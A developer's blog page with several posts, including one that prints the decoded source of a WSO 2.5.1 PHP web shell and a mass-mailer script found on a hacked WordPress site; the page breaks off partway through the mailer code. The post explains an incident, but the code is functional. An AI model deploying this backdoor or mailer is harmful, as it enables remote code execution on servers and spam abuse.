{ Dev Farm }

Web & Windows Development

27 febbraio 2018
di max
3 commenti

[WordPress Plugin Directory] Notice: WP GPX Maps – temporarily disabled

0.00 avg. rating (0% score) - 0 votes

This morning I received the email below, I’ll try to replace Highcharts with Google chart tools soon.

Upon review, your plugin has been found to be in violation of the directory guidelines, found at

https://developer.wordpress.org/plugins/wordpress-org/detailed-plugin-guidelines/

It’s required that all code be compatible with GPL to be included in our directory.

Highcharts and their add ons have been licensed Creative Commons.

Please remove the code and alter the plugin so it is not required. If you cannot alter the code, we suggest you find alternate code that is GPL compatible and use that instead. For more information on what types of licenses are compatible with GPL, please review the following links:

http://www.gnu.org/licenses/license-list.html
http://www.gnu.org/licenses/gpl-faq.html#AllCompatibility

Plugins are closed immediately and the developer contacted when this happens, in part because we have an imperfect system of notifications. This means until your plugin is corrected to meet our guidelines, we will not reopen it. Once you have corrected the issue, checked the code into SVN, and increased your plugin’s version number, please reply and let us know. At that time we will re-review your code (not just the changes, but the entire plugin), so there may be a delay.

Your plugin will not be re-opened until it is reviewed, and it won’t be reviewed until you reply to this email, so please do so as soon as you’ve corrected the issue(s).

If you have any questions, please let us know.

https://wordpress.org/plugins/wp-gpx-maps/

 
 

27 febbraio 2018
di max
0 commenti

New project: IMAP Downloader forensic tool

0.00 avg. rating (0% score) - 0 votes

Sometimes happens to me to download an entire IMAP account, or even multiple IMAP account, on the field. 

This is an apparently easy task, but it’s time consuming. It might take even days with the commercial email clients and a slow internet connection.

Generally I was used to download the account with MS Outlook (with the correct settings) or Thunderbird.

These programs are mail client and they are not optimized to download evething fast, and they don’t have any progress bar who sows the total progress. Expecially MS Outlook download the mails in braches of 4GB and it’s almost impossible to guess how long will it takes.

After the long download process there are the prodecure of hashing the .pst (or the email folder)

I had a huge improvement with SecurCube IMAP Downloader in terms of:

  • time saved
  • evething automized, including hashes

https://github.com/Securcube/ImapDownloader

The steps to clone the IMAP account are:

  • Set the the server and login parameters
  • Select the folders to download (‘All Mail’ folder from Gmail is automatically excluded. In case you can manually select it)
  • Start Download! the software will:
    • Create all the IMAP folder structure directly on a zip file
    • Download all messaged named with it’s IMAP index, readed status and MessageId 
    • Create a log files with: login parameters, server ip, folders downloaded and MD5 – SHA-1 hash codes

The analysis will be demanded to other forensic tool such as ENCASE

18 febbraio 2016
di max
0 commenti

Brutta esperienza ricariche Wind su eBay

5.00 avg. rating (96% score) - 4 votes

Vi racconto la mia esperienza con una ricarica Wind acquistata, a prezzo ridotto, su ebay.

In data 01/12/2015 ho acquistato su ebay una ricarica wind da 50€ di traffico al costo di 33€. La ricarica è arrivata lo stesso giorno senza alcun problema.

Quasi 2 mesi dopo, il 26 gennaio arriva un messaggio dalla wind:

Gentile Cliente a seguito di anomalie di ricarica rilevate, su questa numerazione, provvederemo ad addebitare un importo pari al valore delle ricariche accreditate. Un sms le confermera’ l’attivita’ e l’addebito. Per info 155.

Puntuale qualche minuti dopo mi hanno addebitato la somma. Non avevo 50€ di traffico, allora mi hanno addebitato quello che potevano, lasciandomi 1€ di cortesia

Capture+_2016-01-28-13-32-23           Capture+_2016-01-28-13-31-55

 

Personalmente non acquisterò più ricariche su ebay!

:bye:

6 febbraio 2015
di max
4 commenti

WordPress massmailer malware and WSO 2.5.1 shell backdoor

5.00 avg. rating (93% score) - 2 votes

Ok, I found a suspicious file on another website and it’s a shell backdoor.

/wp-content/backup-2365b/.title14.php
/wp-content/uploads/wysija/themes/rss.lib.php
/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php

this is original content:


and


And this is the unencrypted content:

$auth_pass = "f4eeb83f67a86ea7baaaac13bebe6417";

$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5.1');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    header('HTTP/1.0 404 Not Found');
    die("404");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

function actionRC() {
    if(!@$_POST['p1']) {
        $a = array(
            "uname" => php_uname(),
            "php_version" => phpversion(),
            "wso_version" => WSO_VERSION,
            "safemode" => @ini_get('safe_mode')
        );
        echo serialize($a);
    } else {
        eval($_POST['p1']);
    }
}
if( empty($_POST['a']) )
    if(isset($default_action) && function_exists('action' . $default_action))
        $_POST['a'] = $default_action;
    else
        $_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
    call_user_func('action' . $_POST['a']);
exit;

Another bad file is:

/wp-content/themes/Avada/framework/plugins/envato-wordpress-toolkit-library/object.php

once unencrypted we found a mass mailer!

if(isset($_SERVER))
{
	$_SERVER['PHP_SELF'] = "/"; 
	$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
	if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
	{
		$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
	}
}

if(isset($_FILES))
{
	foreach($_FILES as $key => $file)
	{
		if(!strpos($file['name'], ".jpg"))
		{
			$filename = alter_macros($file['name']);
			$filename = num_macros($filename);
			$filename = xnum_macros($filename);
			$_FILES[$key]["name"] = $filename;
		}
	}
}
	
function custom_strip_tags($text)
{
    $text = strip_tags($text, '');

    $text = str_replace("", "", $text);
    $text = str_replace("\">", " ] ", $text);

    return $text;
}

function is_ip($str) {
  return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
}

function from_host($content)
{

    $host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']);

    if (is_ip($host))
    {
        return $content;
    }
    
    $tokens = explode("@", $content);

    $content = $tokens[0] . "@" . $host . ">";

    return $content;
}

function alter_macros($content)
{
    preg_match_all('#{(.*)}#Ui', $content, $matches);

    for($i = 0; $i < count($matches[1]); $i++)
    {

        $ns = explode("|", $matches[1][$i]);
        $c2 = count($ns);
        $rand = rand(0, ($c2 - 1));
        $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
    }
    return $content;
}


function xnum_macros($content)
{
    preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $num = $matches[1][$i];
        $min = pow(10, $num - 1);
        $max = pow(10, $num) - 1;

        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function num_macros($content)
{
    preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)     {         $min = $matches[1][$i];         $max = $matches[2][$i];         $rand = rand($min, $max);         $content = str_replace($matches[0][$i], $rand, $content);     }     return $content; } function fteil_macros($content, $fteil) {         return str_replace("[FTEIL]", $fteil, $content); } class PHPMailer {     public $Version = '5.2.9';     public $Priority = 3;     public $CharSet = 'iso-8859-1';     public $ContentType = 'text/plain';     public $Encoding = '8bit';     public $ErrorInfo = '';     public $From = 'root@localhost';     public $FromName = 'Root User';     public $Sender = '';     public $ReturnPath = '';     public $Subject = '';     public $Body = '';     public $AltBody = '';     public $Ical = '';     protected $MIMEBody = '';     protected $MIMEHeader = '';     protected $mailHeader = '';     public $WordWrap = 0;     public $Mailer = 'mail';     public $Sendmail = '/usr/sbin/sendmail';     public $UseSendmailOptions = true;     public $PluginDir = '';     public $ConfirmReadingTo = '';     public $Hostname = '';     public $MessageID = '';     public $MessageDate = '';     public $Host = 'localhost';     public $Port = 25;     public $Helo = '';     public $SMTPSecure = '';     public $SMTPAuth = false;     public $Username = '';     public $Password = '';     public $AuthType = '';     public $Realm = '';     public $Workstation = '';     public $Timeout = 300;     public $SMTPDebug = 0;     public $Debugoutput = 'echo';     public $SMTPKeepAlive = false;     public $SingleTo = false;     public $SingleToArray = array();     public $do_verp = false;     public $AllowEmpty = false;     public $LE = "\n";     public $DKIM_selector = '';     public $DKIM_identity = '';     public $DKIM_passphrase = '';     public $DKIM_domain = '';     public $DKIM_private = '';     public $action_function = '';     public $XMailer = '';     protected $smtp = null;     protected $to = array();     protected $cc = array();     protected $bcc = array();     protected $ReplyTo = array();     protected $all_recipients = array();     protected $attachment = array();     protected $CustomHeader = array();     protected $lastMessageID = '';     protected $message_type = '';     protected $boundary = array();     protected $language = array();     protected $error_count = 0;     protected $sign_cert_file = '';     protected $sign_key_file = '';     protected $sign_key_pass = '';     protected $exceptions = false;     const STOP_MESSAGE = 0;     const STOP_CONTINUE = 1;     const STOP_CRITICAL = 2;     const CRLF = "\r\n";     public function __construct($exceptions = false)     {         $this->exceptions = (boolean)$exceptions;
    }

    public function __destruct()
    {

    }

    private function mailPassthru($to, $subject, $body, $header, $params)
    {
        //Check overloading of mail function to avoid double-encoding
        if (ini_get('mbstring.func_overload') & 1) {
            $subject = $this->secureHeader($subject);
        } else {
            $subject = $this->encodeHeader($this->secureHeader($subject));
        }
        if (ini_get('safe_mode') || !($this->UseSendmailOptions)) {
            $result = @mail($to, $subject, $body, $header);
        } else {
            $result = @mail($to, $subject, $body, $header, $params);
        }
        return $result;
    }

    protected function edebug($str)
    {
        if ($this->SMTPDebug <= 0) {             return;         }         //Avoid clash with built-in function names         if (!in_array($this->Debugoutput, array('error_log', 'html', 'echo')) and is_callable($this->Debugoutput)) {
            call_user_func($this->Debugoutput, $str, $this->SMTPDebug);
            return;
        }
        switch ($this->Debugoutput) {
            case 'error_log':
                //Don't output, just log
                error_log($str);
                break;
            case 'html':
                //Cleans up output a bit for a better looking, HTML-safe output
                echo htmlentities(
                    preg_replace('/[\r\n]+/', '', $str),
                    ENT_QUOTES,
                    'UTF-8'
                )
                . "
\n";
                break;
            case 'echo':
            default:
                //Normalize line breaks
                $str = preg_replace('/(\r\n|\r|\n)/ms', "\n", $str);
                echo gmdate('Y-m-d H:i:s') . "\t" . str_replace(
                    "\n",
                    "\n                   \t                  ",
                    trim($str)
                ) . "\n";
        }
    }

    public function isHTML($isHtml = true)
    {
        if ($isHtml) {
            $this->ContentType = 'text/html';
        } else {
            $this->ContentType = 'text/plain';
        }
    }

    public function isSMTP()
    {
        $this->Mailer = 'smtp';
    }

    public function isMail()
    {
        $this->Mailer = 'mail';
    }

    public function isSendmail()
    {
        $ini_sendmail_path = ini_get('sendmail_path');

        if (!stristr($ini_sendmail_path, 'sendmail')) {
            $this->Sendmail = '/usr/sbin/sendmail';
        } else {
            $this->Sendmail = $ini_sendmail_path;
        }
        $this->Mailer = 'sendmail';
    }

    public function isQmail()
    {
        $ini_sendmail_path = ini_get('sendmail_path');

        if (!stristr($ini_sendmail_path, 'qmail')) {
            $this->Sendmail = '/var/qmail/bin/qmail-inject';
        } else {
            $this->Sendmail = $ini_sendmail_path;
        }
        $this->Mailer = 'qmail';
    }

    public function addAddress($address, $name = '')
    {
        return $this->addAnAddress('to', $address, $name);
    }

    public function addCC($address, $name = '')
    {
        return $this->addAnAddress('cc', $address, $name);
    }

    public function addBCC($address, $name = '')
    {
        return $this->addAnAddress('bcc', $address, $name);
    }

    public function addReplyTo($address, $name = '')
    {
        return $this->addAnAddress('Reply-To', $address, $name);
    }

    protected function addAnAddress($kind, $address, $name = '')
    {
        if (!preg_match('/^(to|cc|bcc|Reply-To)$/', $kind)) {
            $this->setError($this->lang('Invalid recipient array') . ': ' . $kind);
            $this->edebug($this->lang('Invalid recipient array') . ': ' . $kind);
            if ($this->exceptions) {
                throw new phpmailerException('Invalid recipient array: ' . $kind);
            }
            return false;
        }
        $address = trim($address);
        $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
        if (!$this->validateAddress($address)) {
            $this->setError($this->lang('invalid_address') . ': ' . $address);
            $this->edebug($this->lang('invalid_address') . ': ' . $address);
            if ($this->exceptions) {
                throw new phpmailerException($this->lang('invalid_address') . ': ' . $address);
            }
            return false;
        }
        if ($kind != 'Reply-To') {
            if (!isset($this->all_recipients[strtolower($address)])) {
                array_push($this->$kind, array($address, $name));
                $this->all_recipients[strtolower($address)] = true;
                return true;
            }
        } else {
            if (!array_key_exists(strtolower($address), $this->ReplyTo)) {
                $this->ReplyTo[strtolower($address)] = array($address, $name);
                return true;
            }
        }
        return false;
    }

    public function setFrom($address, $name = '', $auto = true)
    {
        $address = trim($address);
        $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
        if (!$this->validateAddress($address)) {
            $this->setError($this->lang('invalid_address') . ': ' . $address);
            $this->edebug($this->lang('invalid_address') . ': ' . $address);
            if ($this->exceptions) {
                throw new phpmailerException($this->lang('invalid_address') . ': ' . $address);
            }
            return false;
        }
        $this->From = $address;
        $this->FromName = $name;
        if ($auto) {
            if (empty($this->Sender)) {
                $this->Sender = $address;
            }
        }
        return true;
    }

    public function getLastMessageID()
    {
        return $this->lastMessageID;
    }

    public static function validateAddress($address, $patternselect = 'auto')
    {
        if (!$patternselect or $patternselect == 'auto') {
            //Check this constant first so it works when extension_loaded() is disabled by safe mode
            //Constant was added in PHP 5.2.4
            if (defined('PCRE_VERSION')) {
                //This pattern can get stuck in a recursive loop in PCRE <= 8.0.2                 if (version_compare(PCRE_VERSION, '8.0.3') >= 0) {
                    $patternselect = 'pcre8';
                } else {
                    $patternselect = 'pcre';
                }
            } elseif (function_exists('extension_loaded') and extension_loaded('pcre')) {
                //Fall back to older PCRE
                $patternselect = 'pcre';
            } else {
                //Filter_var appeared in PHP 5.2.0 and does not require the PCRE extension
                if (version_compare(PHP_VERSION, '5.2.0') >= 0) {
                    $patternselect = 'php';
                } else {
                    $patternselect = 'noregex';
                }
            }
        }
        switch ($patternselect) {
            case 'pcre8':

                return (boolean)preg_match(
                    '/^(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){65,}@)' .
                    '((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)' .
                    '(?>[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' .
                    '([!#-\'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' .
                    '(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)' .
                    '(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}' .
                    '|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:' .
                    '|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
                    '|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD',
                    $address
                );
            case 'pcre':
                //An older regex that doesn't need a recent PCRE
                return (boolean)preg_match(
                    '/^(?!(?>"?(?>\\\[ -~]|[^"])"?){255,})(?!(?>"?(?>\\\[ -~]|[^"])"?){65,}@)(?>' .
                    '[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*")' .
                    '(?>\.(?>[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*"))*' .
                    '@(?>(?![a-z0-9-]{64,})(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)(?>\.(?![a-z0-9-]{64,})' .
                    '(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)){0,126}|\[(?:(?>IPv6:(?>(?>[a-f0-9]{1,4})(?>:' .
                    '[a-f0-9]{1,4}){7}|(?!(?:.*[a-f0-9][:\]]){8,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?' .
                    '::(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?))|(?>(?>IPv6:(?>[a-f0-9]{1,4}(?>:' .
                    '[a-f0-9]{1,4}){5}:|(?!(?:.*[a-f0-9]:){6,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4})?' .
                    '::(?>(?:[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4}):)?))?(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
                    '|[1-9]?[0-9])(?>\.(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])){3}))\])$/isD',
                    $address
                );
            case 'html5':
                return (boolean)preg_match(
                    '/^[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' .
                    '[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD',
                    $address
                );
            case 'noregex':
                return (strlen($address) >= 3
                    and strpos($address, '@') >= 1
                    and strpos($address, '@') != strlen($address) - 1);
            case 'php':
            default:
                return (boolean)filter_var($address, FILTER_VALIDATE_EMAIL);
        }
    }

    public function send()
    {
        try {
            if (!$this->preSend()) {
                return false;
            }
            return $this->postSend();
        } catch (phpmailerException $exc) {
            $this->mailHeader = '';
            $this->setError($exc->getMessage());
            if ($this->exceptions) {
                throw $exc;
            }
            return false;
        }
    }

    public function preSend()
    {
        try {
            $this->mailHeader = '';
            if ((count($this->to) + count($this->cc) + count($this->bcc)) < 1) {                 throw new phpmailerException($this->lang('provide_address'), self::STOP_CRITICAL);
            }

            // Set whether the message is multipart/alternative
            if (!empty($this->AltBody)) {
                $this->ContentType = 'multipart/alternative';
            }

            $this->error_count = 0; // reset errors
            $this->setMessageType();
            // Refuse to send an empty message unless we are specifically allowing it
            if (!$this->AllowEmpty and empty($this->Body)) {
                throw new phpmailerException($this->lang('empty_message'), self::STOP_CRITICAL);
            }

            $this->MIMEHeader = $this->createHeader();
            $this->MIMEBody = $this->createBody();

            if ($this->Mailer == 'mail') {
                if (count($this->to) > 0) {
                    $this->mailHeader .= $this->addrAppend('To', $this->to);
                } else {
                    $this->mailHeader .= $this->headerLine('To', 'undisclosed-recipients:;');
                }
                $this->mailHeader .= $this->headerLine(
                    'Subject',
                    $this->encodeHeader($this->secureHeader(trim($this->Subject)))
                );
            }

            // Sign with DKIM if enabled
            if (!empty($this->DKIM_domain)
                && !empty($this->DKIM_private)
                && !empty($this->DKIM_selector)
                && file_exists($this->DKIM_private)) {
                $header_dkim = $this->DKIM_Add(
                    $this->MIMEHeader . $this->mailHeader,
                    $this->encodeHeader($this->secureHeader($this->Subject)),
                    $this->MIMEBody
                );
                $this->MIMEHeader = rtrim($this->MIMEHeader, "\r\n ") . self::CRLF .
                    str_replace("\r\n", "\n", $header_dkim) . self::CRLF;
            }
            return true;

        } catch (phpmailerException $exc) {
            $this->setError($exc->getMessage());
            if ($this->exceptions) {
                throw $exc;
            }
            return false;
        }
    }

    public function postSend()
    {
        try {
            // Choose the mailer and send through it
            switch ($this->Mailer) {
                case 'sendmail':
                case 'qmail':
                    return $this->sendmailSend($this->MIMEHeader, $this->MIMEBody);
                case 'mail':
                    return $this->mailSend($this->MIMEHeader, $this->MIMEBody);
                default:
                    $sendMethod = $this->Mailer.'Send';
                    if (method_exists($this, $sendMethod)) {
                        return $this->$sendMethod($this->MIMEHeader, $this->MIMEBody);
                    }

                    return $this->mailSend($this->MIMEHeader, $this->MIMEBody);
            }
        } catch (phpmailerException $exc) {
            $this->setError($exc->getMessage());
            $this->edebug($exc->getMessage());
            if ($this->exceptions) {
                throw $exc;
            }
        }
        return false;
    }

    protected function sendmailSend($header, $body)
    {
        if ($this->Sender != '') {
            if ($this->Mailer == 'qmail') {
                $sendmail = sprintf('%s -f%s', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
            } else {
                $sendmail = sprintf('%s -oi -f%s -t', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
            }
        } else {
            if ($this->Mailer == 'qmail') {
                $sendmail = sprintf('%s', escapeshellcmd($this->Sendmail));
            } else {
                $sendmail = sprintf('%s -oi -t', escapeshellcmd($this->Sendmail));
            }
        }
        if ($this->SingleTo) {
            foreach ($this->SingleToArray as $toAddr) {
                if (!@$mail = popen($sendmail, 'w')) {
                    throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
                }
                fputs($mail, 'To: ' . $toAddr . "\n");
                fputs($mail, $header);
                fputs($mail, $body);
                $result = pclose($mail);
                $this->doCallback(
                    ($result == 0),
                    array($toAddr),
                    $this->cc,
                    $this->bcc,
                    $this->Subject,
                    $body,
                    $this->From
                );
                if ($result != 0) {
                    throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
                }
            }
        } else {
            if (!@$mail = popen($sendmail, 'w')) {
                throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
            }
            fputs($mail, $header);
            fputs($mail, $body);
            $result = pclose($mail);
            $this->doCallback(($result == 0), $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
            if ($result != 0) {
                throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
            }
        }
        return true;
    }

    protected function mailSend($header, $body)
    {
        $toArr = array();
        foreach ($this->to as $toaddr) {
            $toArr[] = $this->addrFormat($toaddr);
        }
        $to = implode(', ', $toArr);

        if (empty($this->Sender)) {
            $params = ' ';
        } else {
            $params = sprintf('-f%s', $this->Sender);
        }
        if ($this->Sender != '' and !ini_get('safe_mode')) {
            $old_from = ini_get('sendmail_from');
            ini_set('sendmail_from', $this->Sender);
        }
        $result = false;
        if ($this->SingleTo && count($toArr) > 1) {
            foreach ($toArr as $toAddr) {
                $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);
                $this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From);
            }
        } else {
            $result = $this->mailPassthru($to, $this->Subject, $body, $header, $params);
            $this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
        }
        if (isset($old_from)) {
            ini_set('sendmail_from', $old_from);
        }
        if (!$result) {
            throw new phpmailerException($this->lang('instantiate'), self::STOP_CRITICAL);
        }
        return true;
    }

    public function setLanguage($langcode = 'en', $lang_path = '')
    {
        // Define full set of translatable strings in English
        $PHPMAILER_LANG = array(
            'authenticate' => 'SMTP Error: Could not authenticate.',
            'connect_host' => 'SMTP Error: Could not connect to SMTP host.',
            'data_not_accepted' => 'SMTP Error: data not accepted.',
            'empty_message' => 'Message body empty',
            'encoding' => 'Unknown encoding: ',
            'execute' => 'Could not execute: ',
            'file_access' => 'Could not access file: ',
            'file_open' => 'File Error: Could not open file: ',
            'from_failed' => 'The following From address failed: ',
            'instantiate' => 'Could not instantiate mail function.',
            'invalid_address' => 'Invalid address',
            'mailer_not_supported' => ' mailer is not supported.',
            'provide_address' => 'You must provide at least one recipient email address.',
            'recipients_failed' => 'SMTP Error: The following recipients failed: ',
            'signing' => 'Signing Error: ',
            'smtp_connect_failed' => 'SMTP connect() failed.',
            'smtp_error' => 'SMTP server error: ',
            'variable_set' => 'Cannot set or reset variable: '
        );
        if (empty($lang_path)) {
            // Calculate an absolute path so it can work if CWD is not here
            $lang_path = dirname(__FILE__). DIRECTORY_SEPARATOR . 'language'. DIRECTORY_SEPARATOR;
        }
        $foundlang = true;
        $lang_file = $lang_path . 'phpmailer.lang-' . $langcode . '.php';
        if ($langcode != 'en') { // There is no English translation file
            // Make sure language file path is readable
            if (!is_readable($lang_file)) {
                $foundlang = false;
            } else {
                $foundlang = include $lang_file;
            }
        }
        $this->language = $PHPMAILER_LANG;
        return (boolean)$foundlang; // Returns false if language not found
    }

    public function getTranslations()
    {
        return $this->language;
    }

    public function addrAppend($type, $addr)
    {
        $addresses = array();
        foreach ($addr as $address) {
            $addresses[] = $this->addrFormat($address);
        }
        return $type . ': ' . implode(', ', $addresses) . $this->LE;
    }


    public function addrFormat($addr)
    {
        if (empty($addr[1])) { // No name provided
            return $this->secureHeader($addr[0]);
        } else {
            return $this->encodeHeader($this->secureHeader($addr[1]), 'phrase') . ' <' . $this->secureHeader(
                $addr[0]
            ) . '>';
        }
    }


    public function wrapText($message, $length, $qp_mode = false)
    {
        $soft_break = ($qp_mode) ? sprintf(' =%s', $this->LE) : $this->LE;

        $is_utf8 = (strtolower($this->CharSet) == 'utf-8');
        $lelen = strlen($this->LE);
        $crlflen = strlen(self::CRLF);

        $message = $this->fixEOL($message);
        if (substr($message, -$lelen) == $this->LE) {
            $message = substr($message, 0, -$lelen);
        }

        $line = explode($this->LE, $message); // Magic. We know fixEOL uses $LE
        $message = '';
        for ($i = 0; $i < count($line); $i++) {
            $line_part = explode(' ', $line[$i]);
            $buf = '';
            for ($e = 0; $e < count($line_part); $e++) {                 $word = $line_part[$e];                 if ($qp_mode and (strlen($word) > $length)) {
                    $space_left = $length - strlen($buf) - $crlflen;
                    if ($e != 0) {
                        if ($space_left > 20) {
                            $len = $space_left;
                            if ($is_utf8) {
                                $len = $this->utf8CharBoundary($word, $len);
                            } elseif (substr($word, $len - 1, 1) == '=') {
                                $len--;
                            } elseif (substr($word, $len - 2, 1) == '=') {
                                $len -= 2;
                            }
                            $part = substr($word, 0, $len);
                            $word = substr($word, $len);
                            $buf .= ' ' . $part;
                            $message .= $buf . sprintf('=%s', self::CRLF);
                        } else {
                            $message .= $buf . $soft_break;
                        }
                        $buf = '';
                    }
                    while (strlen($word) > 0) {
                        if ($length <= 0) {                             break;                         }                         $len = $length;                         if ($is_utf8) {                             $len = $this->utf8CharBoundary($word, $len);
                        } elseif (substr($word, $len - 1, 1) == '=') {
                            $len--;
                        } elseif (substr($word, $len - 2, 1) == '=') {
                            $len -= 2;
                        }
                        $part = substr($word, 0, $len);
                        $word = substr($word, $len);

                        if (strlen($word) > 0) {
                            $message .= $part . sprintf('=%s', self::CRLF);
                        } else {
                            $buf = $part;
                        }
                    }
                } else {
                    $buf_o = $buf;
                    $buf .= ($e == 0) ? $word : (' ' . $word);

                    if (strlen($buf) > $length and $buf_o != '') {
                        $message .= $buf_o . $soft_break;
                        $buf = $word;
                    }
                }
            }
            $message .= $buf . self::CRLF;
        }

        return $message;
    }

    public function utf8CharBoundary($encodedText, $maxLength)
    {
        $foundSplitPos = false;
        $lookBack = 3;
        while (!$foundSplitPos) {
            $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack);
            $encodedCharPos = strpos($lastChunk, '=');
            if (false !== $encodedCharPos) {
                // Found start of encoded character byte within $lookBack block.
                // Check the encoded byte value (the 2 chars after the '=')
                $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2);
                $dec = hexdec($hex);
                if ($dec < 128) { // Single byte character.                     // If the encoded char was found at pos 0, it will fit                     // otherwise reduce maxLength to start of the encoded char                     $maxLength = ($encodedCharPos == 0) ? $maxLength :                         $maxLength - ($lookBack - $encodedCharPos);                     $foundSplitPos = true;                 } elseif ($dec >= 192) { // First byte of a multi byte character
                    // Reduce maxLength to split at start of character
                    $maxLength = $maxLength - ($lookBack - $encodedCharPos);
                    $foundSplitPos = true;
                } elseif ($dec < 192) { // Middle byte of a multi byte character, look further back                     $lookBack += 3;                 }             } else {                 // No encoded character found                 $foundSplitPos = true;             }         }         return $maxLength;     }     public function setWordWrap()     {         if ($this->WordWrap < 1) {             return;         }         switch ($this->message_type) {
            case 'alt':
            case 'alt_inline':
            case 'alt_attach':
            case 'alt_inline_attach':
                $this->AltBody = $this->wrapText($this->AltBody, $this->WordWrap);
                break;
            default:
                $this->Body = $this->wrapText($this->Body, $this->WordWrap);
                break;
        }
    }

    public function createHeader()
    {
        $result = '';

        // Set the boundaries
        $uniq_id = md5(uniqid(time()));
        $this->boundary[1] = 'b1_' . $uniq_id;
        $this->boundary[2] = 'b2_' . $uniq_id;
        $this->boundary[3] = 'b3_' . $uniq_id;

        if ($this->MessageDate == '') {
            $this->MessageDate = self::rfcDate();
        }
        $result .= $this->headerLine('Date', $this->MessageDate);


        // To be created automatically by mail()
        if ($this->SingleTo) {
            if ($this->Mailer != 'mail') {
                foreach ($this->to as $toaddr) {
                    $this->SingleToArray[] = $this->addrFormat($toaddr);
                }
            }
        } else {
            if (count($this->to) > 0) {
                if ($this->Mailer != 'mail') {
                    $result .= $this->addrAppend('To', $this->to);
                }
            } elseif (count($this->cc) == 0) {
                $result .= $this->headerLine('To', 'undisclosed-recipients:;');
            }
        }

        $result .= $this->addrAppend('From', array(array(trim($this->From), $this->FromName)));

